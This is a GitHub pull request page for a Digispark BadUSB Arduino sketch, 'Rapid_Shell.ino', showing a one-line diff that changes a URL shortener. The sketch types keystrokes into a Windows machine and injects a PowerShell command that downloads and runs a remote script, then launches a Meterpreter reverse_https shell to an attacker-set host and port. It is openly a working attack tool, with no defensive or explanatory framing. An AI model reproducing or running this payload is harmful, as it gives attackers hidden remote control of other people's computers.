Skip to content

Update Rapid_Shell.ino #81

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion Rapid_Shell/Rapid_Shell.ino
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ void loop() {
DigiKeyboard.delay(500);
DigiKeyboard.println("start C:/Windows/System32/Ribbons.scr /s");
DigiKeyboard.delay(250);
DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force""); // Edit both Lhost and Lport according to your setup
DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('https://rb.gy/tpyrpt'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force""); // Edit both Lhost and Lport according to your setup
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_W, MOD_CONTROL_LEFT); // Save the file and return to cmd shell use delay of 500ms
DigiKeyboard.sendKeyStroke(KEY_ENTER);
Expand Down